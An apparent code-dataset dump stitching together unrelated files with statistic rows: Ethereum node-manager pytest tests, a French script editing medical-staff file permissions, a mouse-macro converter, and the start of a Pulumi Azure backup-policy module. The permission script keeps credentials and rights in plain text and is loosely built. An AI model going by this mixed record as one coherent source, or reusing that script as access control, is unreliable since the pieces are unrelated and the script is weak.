5\xc9\xc4{e\x07\xa2:\xee\x0f\xb3&\xcf_3[{\xcc\x13]~o\xe9\xd1\xd8\x02\xe0\x9f\xaa\xce\x1aZ\xaf\\'\xb7&\x99l\x10\xe7u4\x11\xc6V\x17\xb3\xb5)z\xd5\x04/7\xd8\x04\x07y\xb1\xa8\xfe\x0c\x1c\xa5\xc9\xc4{e\x07\xa2:\xee\x0f\xb3&\xcf_3[{\xcc\x13]~o\xe9\xd1\xd8\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\xf2BC*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/g\x89\xa2\x08\xa0\\v,\xa8\xd1B\xa3\xdf\x95\xd2\x9c\x18\xb0ep\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\xf2BC*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", # noqa: E501
nonce=204,
)
assert result == expected_tx
@pytest.mark.parametrize('ethrpc_endpoint,ethereum_manager_connect_at_start,call_order', [
(
'',
[x for x in OPEN_NODES if x != NodeName.ETHERSCAN],
[x for x in OPEN_NODES if x != NodeName.ETHERSCAN],
),
])
def test_use_open_nodes(ethereum_manager, call_order, ethereum_manager_connect_at_start):
"""Test that we can connect to and use the open nodes (except from etherscan)
Note: If this fails with transaction not found probably open nodes started pruning.
Change test to use a more recent transaction.
"""
# Wait until all nodes are connected
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
result = ethereum_manager.get_transaction_receipt(
'0x1470187132df3b6755ed30774a772ec8bbc1cd27f10a8a6b7f6095dd95560f20',
call_order=call_order,
)
block_hash = '0x23daab1980fd238778750bf9ac732fa1bb45e3439fa208ac47f5995efb5924e3'
assert result['blockHash'] == block_hash
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_call_contract(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
result = ethereum_manager.call_contract(
contract_address=YEARN_YCRV_VAULT.address,
abi=YEARN_YCRV_VAULT.abi,
method_name='symbol',
call_order=call_order,
)
assert result == 'yyDAI+yUSDC+yUSDT+yTUSD'
# also test that doing contract.call() has the same result
result2 = YEARN_YCRV_VAULT.call(ethereum_manager, 'symbol', call_order=call_order)
assert result == result2
result = ethereum_manager.call_contract(
contract_address=YEARN_YCRV_VAULT.address,
abi=YEARN_YCRV_VAULT.abi,
method_name='balanceOf',
arguments=['0x5dbcF33D8c2E976c6b560249878e6F1491Bca25c'],
call_order=call_order,
)
assert result >= 0
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_logs(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
argument_filters = {
'from': '0x7780E86699e941254c8f4D9b7eB08FF7e96BBE10',
'to': YEARN_YCRV_VAULT.address,
}
events = ethereum_manager.get_logs(
contract_address='0xdF5e0e81Dff6FAF3A7e52BA697820c5e32D806A8',
abi=ERC20TOKEN_ABI,
event_name='Transfer',
argument_filters=argument_filters,
from_block=10712531,
to_block=10712753,
call_order=call_order,
)
assert len(events) == 1
expected_event = {
'address': '0xdF5e0e81Dff6FAF3A7e52BA697820c5e32D806A8',
'blockNumber': 10712731,
'data': '0x0000000000000000000000000000000000000000000001e3f60028423cff0000',
'gasPrice': 72000000000,
'gasUsed': 93339,
'logIndex': 157,
'topics': [
'0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef',
'0x0000000000000000000000007780e86699e941254c8f4d9b7eb08ff7e96bbe10',
'0x0000000000000000000000005dbcf33d8c2e976c6b560249878e6f1491bca25c',
],
'transactionHash': '0xca33e56e1e529dacc9aa1261c8ba9230927329eb609fbe252e5bd3c2f5f3bcc9',
'transactionIndex': 85,
}
assert_serialized_dicts_equal(
events[0],
expected_event,
same_key_length=False,
ignore_keys=[
'timeStamp', # returned from etherscan
'blockHash', # returned from web3
'removed', # returned from web3
],
)
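# Illustrative only: the shape of the comparison performed above, where keys
# that differ between etherscan and web3 responses are skipped. This sketch is
# not rotkehlchen's assert_serialized_dicts_equal implementation; the helper
# name and the sample dicts below are hypothetical.
def _sketch_dicts_equal_ignoring(a, b, ignore):
    keys = (set(a) | set(b)) - set(ignore)
    return all(a.get(k) == b.get(k) for k in keys)
assert _sketch_dicts_equal_ignoring(
    {'logIndex': 157, 'blockHash': '0xabc'},
    {'logIndex': 157},
    ignore={'blockHash'},
)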
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_log_and_receipt_etherscan_bad_tx_index(
ethereum_manager,
call_order,
ethereum_manager_connect_at_start,
):
"""
https://etherscan.io/tx/0x00eea6359d247c9433d32620358555a0fd3265378ff146b9511b7cff1ecb7829
contains a log entry which in etherscan has transaction index 0x.
Our code was not handling this well and was raising ValueError.
This is a regression test for that.
"""
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
    # Test that getting the offending log entry does not raise
argument_filters = {
'from': ZERO_ADDRESS,
'to': '0xbA215F7BE6c620dA3F8240B82741eaF3C5f5D786',
}
events = ethereum_manager.get_logs(
contract_address='0xFC4B8ED459e00e5400be803A9BB3954234FD50e3',
abi=ATOKEN_ABI,
event_name='Transfer',
argument_filters=argument_filters,
from_block=10773651,
to_block=10773653,
call_order=call_order,
)
assert len(events) == 2
assert events[0]['transactionIndex'] == 0
assert events[1]['transactionIndex'] == 0
    # Test that getting the transaction receipt (which also contains the log
    # entries) does not raise; the transaction indices all seem to be 0 here
result = ethereum_manager.get_transaction_receipt(
hexstring_to_bytes('0x00eea6359d247c9433d32620358555a0fd3265378ff146b9511b7cff1ecb7829'),
call_order=call_order,
)
assert all(x['transactionIndex'] == 0 for x in result['logs'])
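# The regression above reduces to parsing a transaction index that etherscan
# sometimes returns as the bare prefix '0x'. A hypothetical helper sketching
# that defensive conversion; rotkehlchen's actual deserializer may differ.
def _sketch_parse_tx_index(raw) -> int:
    """Map etherscan's occasional bare '0x' (or empty) index to 0."""
    if raw in (None, '', '0x'):
        return 0
    return int(raw, 16) if isinstance(raw, str) else int(raw)
assert _sketch_parse_tx_index('0x') == 0
assert _sketch_parse_tx_index('0x6e') == 110
assert _sketch_parse_tx_index(85) == 85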
def test_nodes_weight_map():
"""Test the weight map has no duplicates and adds to 100%"""
nodes_set = set()
total = ZERO
for node, value in OPEN_NODES_WEIGHT_MAP.items():
assert node not in nodes_set, f'node {str(node)} appears more than once'
nodes_set.add(node)
total += FVal(value)
assert total == ONE
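# Illustrative only: the invariant checked above (unique nodes, weights that
# sum to one) is what lets callers pick a node proportionally to its weight.
# The node names and weights below are hypothetical, not rotkehlchen's map.
import random
_demo_weight_map = {'node_a': 0.5, 'node_b': 0.3, 'node_c': 0.2}
_nodes, _weights = zip(*_demo_weight_map.items())
_picked = random.choices(_nodes, weights=_weights, k=1)[0]  # weighted draw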
def test_nodes_sets():
"""Test that all nodes sets contain the nodes they should"""
assert set(OPEN_NODES) - set({NodeName.ETHERSCAN}) == set(ETHEREUM_NODES_TO_CONNECT_AT_START) - set({NodeName.OWN}) # noqa: E501
assert set(OPEN_NODES_WEIGHT_MAP.keys()) - set({NodeName.ETHERSCAN}) == set(ETHEREUM_NODES_TO_CONNECT_AT_START) - set({NodeName.OWN}) # noqa: E501
@pytest.mark.skipif(
'CI' in os.environ,
reason='This test is only for us to figure out the speed of the open nodes',
)
def test_nodes_speed():
"""TODO"""
def _test_get_blocknumber_by_time(eth_manager, etherscan):
result = eth_manager.get_blocknumber_by_time(1577836800, etherscan=etherscan)
assert result == 9193265
def test_get_blocknumber_by_time_subgraph(ethereum_manager):
"""Queries the blocks subgraph for known block times"""
_test_get_blocknumber_by_time(ethereum_manager, False)
def test_get_blocknumber_by_time_etherscan(ethereum_manager):
"""Queries etherscan for known block times"""
_test_get_blocknumber_by_time(ethereum_manager, True)
| 71.767647
| 10,617
| 0.726569
| 4,272
| 24,401
| 4.050094
| 0.112828
| 0.807999
| 1.183909
| 1.541787
| 0.658826
| 0.643336
| 0.617848
| 0.604901
| 0.602011
| 0.580569
| 0
| 0.297456
| 0.109012
| 24,401
| 339
| 10,618
| 71.979351
| 0.498367
| 0.053481
| 0
| 0.257143
| 0
| 0.028571
| 0.594183
| 0.572708
| 0
| 1
| 0.052689
| 0.00295
| 0.117857
| 1
| 0.046429
| false
| 0
| 0.05
| 0
| 0.096429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
86d03d171db9e5e22e691109cc59a9f0dccec6a4
| 7,981
|
py
|
Python
|
serveur/gestionDroits/rightsHandler2.py
|
PL4typus/SysNetProject17
|
283c127a3363876360bc52b54eae939c6104c6b4
|
[
"MIT"
] | null | null | null |
serveur/gestionDroits/rightsHandler2.py
|
PL4typus/SysNetProject17
|
283c127a3363876360bc52b54eae939c6104c6b4
|
[
"MIT"
] | null | null | null |
serveur/gestionDroits/rightsHandler2.py
|
PL4typus/SysNetProject17
|
283c127a3363876360bc52b54eae939c6104c6b4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.4
# coding: utf-8
import sys, socket, os, time, numpy
## Function that returns a list of lists of the form: [[user1,pwd1],[user2,pwd2]] ##
def lecture_fichier(fichier):  # [[name1,pwd1],[name2,pwd2]...]
f = open(fichier,'r')
fo = f.read(2048)
l=fo.splitlines()
for i in range(len(l)) :
l[i] = l[i].split(':')
f.close()
return l
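# Usage sketch for lecture_fichier, assuming a "name:password" line format;
# the temporary file and the credentials below are made up for illustration.
import tempfile
with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as tmp:
    tmp.write("alice:secret\nbob:hunter2\n")
demo_creds = lecture_fichier(tmp.name)
# demo_creds == [['alice', 'secret'], ['bob', 'hunter2']]
os.remove(tmp.name)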
def rightsManager(Droit,user):
PATH_INF="/home/squirrel/Documents/projets/NETWORK/projetreseau17/Authentification/passwordInf.txt"
PATH_INT="/home/squirrel/Documents/projets/NETWORK/projetreseau17/Authentification/passwordInt.txt"
PATH_MED="/home/squirrel/Documents/projets/NETWORK/projetreseau17/Authentification/passwordMed.txt"
PATH_DROITS_Inf="fichier_droitsInf.plp"
PATH_DROITS_Int="fichier_droitsInt.plp"
tab_droits={}
ans=" "
adoube=" "
fich=" "
ls = " "
check=False
if Droit=="M":
        while True:
            print("Modifier les droits de qui ?")
            print("")
            ans = " "      # reset so the menu prompt runs again on each pass
            check = False  # reset the per-user selection flag
            while ans not in {"Inf","I","INF","inf","i","q","Q"}:
                print("(Inf)irmier \t (I)nterne \t (Q)uitter")
                ans = input(">")  # conn_client.recv().decode()
            if ans in {"q","Q"}:
                break  # leave the permissions-modification loop
if ans in {"Inf","INF","inf"}:
print("Quelle personne ?")
l=lecture_fichier(PATH_INF)
for i in l:
print(i[0])
while check==False:
print("Veuillez choisir quelqu'un dans la liste ou Q pour quitter")
adoube=input(">>") #conn_client.recv().decode()
for i in l:
if (adoube == i[0]) or (adoube in {"q","Q"}):
check = True
if adoube not in {"q","Q"}:
print(adoube," a actuellement les droits suivants:")
f = open(PATH_DROITS_Inf,"r")
rights=f.read().splitlines()
f.close()
already=False
saved_i=0
for i in range(len(rights)):
rights[i]=rights[i].split(";")
                    for i in range(len(rights)):
if rights[i][0]==adoube:
print("Par defaut, ",rights[i][2])
saved_i=i
already=True
if already==False:
liste=[[adoube,"default",rights[0][2]]]
rights.extend(liste)
for j in range(len(rights[saved_i])):
if j%2==1:
print("Pour le fichier ",rights[saved_i][j],": ",rights[saved_i][j+1])
print("Entrez un nom de fichier puis les nouveaux droits. Ex: ficheMichu rw")
print("r : droits de lecture \t w : droits d'écriture (la personne verra le contenu du fichier lors de l'édition")
print("Entrez § pour terminer")
verdict=" "
t_verdict=rights[saved_i][1]+" "+rights[saved_i][2]
k=0
while verdict != "§":
verdict=input(">>>>>:")
if verdict != "§":
t_verdict = t_verdict+ ";"+verdict
t_verdict=t_verdict.split(";")
for i in range(len(t_verdict)):
t_verdict[i]=t_verdict[i].split(" ")
di_verdict={}
for i in range(len(t_verdict)):
for j in range(len(t_verdict[i])):
di_verdict[t_verdict[i][0]]=t_verdict[i][1]
for key in di_verdict.keys():
if key not in rights[saved_i]:
                            rights[saved_i].extend([key, di_verdict.get(key)])  # append the new file and its permission to this user's row
for i in range(len(rights[saved_i])):
if rights[saved_i][i]==key:
print(rights[saved_i][i],rights[saved_i][i+1])
rights[saved_i][i+1]=di_verdict.get(key,"r")
f = open(PATH_DROITS_Inf,"w")
tampon=""
for i in range(len(rights)):
for j in range(len(rights[i])):
tampon=tampon+rights[i][j]+";"
print(tampon)
tampon=tampon+"\n"
                    f.write(tampon)
                    f.close()
if ans in {"I","i"}:
print("Quelle personne ?")
l=lecture_fichier(PATH_INT)
for i in l:
print(i[0])
while check==False:
print("Veuillez choisir quelqu'un dans la liste ou Q pour quitter")
adoube=input(">>") #conn_client.recv().decode()
for i in l:
if (adoube == i[0]) or (adoube in {"q","Q"}):
check = True
if adoube not in {"q","Q"}:
print(adoube," a actuellement les droits suivants:")
f = open(PATH_DROITS_Int,"r")
rights=f.read().splitlines()
f.close()
already=False
saved_i=0
for i in range(len(rights)):
rights[i]=rights[i].split(";")
                    for i in range(len(rights)):
if rights[i][0]==adoube:
print("Par defaut, ",rights[i][2])
saved_i=i
already=True
if already==False:
liste=[[adoube,"default",rights[0][2]]]
rights.extend(liste)
for j in range(len(rights[saved_i])):
if j%2==1:
print("Pour le fichier ",rights[saved_i][j],": ",rights[saved_i][j+1])
print("Entrez un nom de fichier puis les nouveaux droits. Ex: ficheMichu rw")
print("r : droits de lecture \t w : droits d'écriture (la personne verra le contenu du fichier lors de l'édition")
print("Entrez § pour terminer")
verdict=" "
t_verdict=rights[saved_i][1]+" "+rights[saved_i][2]
k=0
while verdict != "§":
verdict=input(">>>>>:")
if verdict != "§":
t_verdict = t_verdict+ ";"+verdict
t_verdict=t_verdict.split(";")
for i in range(len(t_verdict)):
t_verdict[i]=t_verdict[i].split(" ")
di_verdict={}
for i in range(len(t_verdict)):
for j in range(len(t_verdict[i])):
di_verdict[t_verdict[i][0]]=t_verdict[i][1]
for key in di_verdict.keys():
if key not in rights[saved_i]:
                            rights[saved_i].extend([key, di_verdict.get(key)])  # append the new file and its permission to this user's row
for i in range(len(rights[saved_i])):
if rights[saved_i][i]==key:
print(rights[saved_i][i],rights[saved_i][i+1])
rights[saved_i][i+1]=di_verdict.get(key,"r")
f = open(PATH_DROITS_Int,"w")
tampon=""
for i in range(len(rights)):
for j in range(len(rights[i])):
tampon=tampon+rights[i][j]+";"
print(tampon)
tampon=tampon+"\n"
                    f.write(tampon)
                    f.close()
rightsManager("M","/home/squirrel/Documents/projets/NETWORK/projetreseau17/TraitementTxtFork/user")
| 42.005263
| 134
| 0.436913
| 875
| 7,981
| 3.891429
| 0.168
| 0.049339
| 0.084582
| 0.041997
| 0.824963
| 0.809985
| 0.795595
| 0.716006
| 0.716006
| 0.716006
| 0
| 0.012695
| 0.437414
| 7,981
| 189
| 135
| 42.227513
| 0.744321
| 0.028818
| 0
| 0.76129
| 0
| 0.012903
| 0.157623
| 0.049612
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012903
| false
| 0.019355
| 0.006452
| 0
| 0.025806
| 0.167742
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
810a958b28619b1e48839fe78c23ec6ffae1371b
| 1,267
|
py
|
Python
|
amctologi.py
|
vsekov/LogitechMacrosHelper
|
91d5ec00060155a789a799fd3a92fa49183cea1d
|
[
"MIT"
] | null | null | null |
amctologi.py
|
vsekov/LogitechMacrosHelper
|
91d5ec00060155a789a799fd3a92fa49183cea1d
|
[
"MIT"
] | 1
|
2021-12-06T08:27:16.000Z
|
2021-12-06T08:27:16.000Z
|
amctologi.py
|
vsekov/LogitechMacrosHelper
|
91d5ec00060155a789a799fd3a92fa49183cea1d
|
[
"MIT"
] | null | null | null |
import re
s = """
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 1
"""
sep = s.splitlines()
# print(sep)
output=""
for i in sep:
ints = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", i)
if("Delay" in i):
# ints = [int(s) for s in i.split() if s.isdigit()]
output+=(f"Sleep({ints[0]})")+"\n"
elif("MoveR" in i):
# ints = [int(s) for s in i.split() if s.isdigit()]
output+=(f"MoveMouseRelative({ints[0]}, {ints[1]})")+"\n"
f = open("amctologi.txt", "w")
f.write(output)
f.close()
# for i in sep:
# print(i)
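# A self-contained check of the Delay/MoveR translation performed above,
# using a simplified integer pattern in place of the fuller regex; the two
# sample records mirror the macro text at the top of the file.
assert re.findall(r"[-+]?\d+", "Delay 23 ms") == ["23"]
_dx, _dy = re.findall(r"[-+]?\d+", "MoveR 0 27")
assert f"MoveMouseRelative({_dx}, {_dy})" == "MoveMouseRelative(0, 27)"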
| 15.641975
| 81
| 0.578532
| 259
| 1,267
| 2.830116
| 0.146718
| 0.276944
| 0.356071
| 0.553888
| 0.759891
| 0.759891
| 0.759891
| 0.759891
| 0.759891
| 0.759891
| 0
| 0.149103
| 0.295975
| 1,267
| 81
| 82
| 15.641975
| 0.672646
| 0.108129
| 0
| 0.791667
| 0
| 0
| 0.75311
| 0.075598
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013889
| 0
| 0.013889
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
812c90aabd7b8cac1b9e39908fe5c956034a7adf
| 34,402
|
py
|
Python
|
sdk/python/pulumi_azure/backup/policy_file_share.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/backup/policy_file_share.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/backup/policy_file_share.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PolicyFileShareArgs', 'PolicyFileShare']
@pulumi.input_type
class PolicyFileShareArgs:
def __init__(__self__, *,
backup: pulumi.Input['PolicyFileShareBackupArgs'],
recovery_vault_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
retention_daily: pulumi.Input['PolicyFileShareRetentionDailyArgs'],
name: Optional[pulumi.Input[str]] = None,
retention_monthly: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']] = None,
retention_weekly: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']] = None,
retention_yearly: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a PolicyFileShare resource.
:param pulumi.Input['PolicyFileShareBackupArgs'] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input['PolicyFileShareRetentionDailyArgs'] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input['PolicyFileShareRetentionMonthlyArgs'] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input['PolicyFileShareRetentionWeeklyArgs'] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input['PolicyFileShareRetentionYearlyArgs'] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
pulumi.set(__self__, "backup", backup)
pulumi.set(__self__, "recovery_vault_name", recovery_vault_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "retention_daily", retention_daily)
if name is not None:
pulumi.set(__self__, "name", name)
if retention_monthly is not None:
pulumi.set(__self__, "retention_monthly", retention_monthly)
if retention_weekly is not None:
pulumi.set(__self__, "retention_weekly", retention_weekly)
if retention_yearly is not None:
pulumi.set(__self__, "retention_yearly", retention_yearly)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timezone is not None:
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def backup(self) -> pulumi.Input['PolicyFileShareBackupArgs']:
"""
Configures the Policy backup frequency and times as documented in the `backup` block below.
"""
return pulumi.get(self, "backup")
@backup.setter
def backup(self, value: pulumi.Input['PolicyFileShareBackupArgs']):
pulumi.set(self, "backup", value)
@property
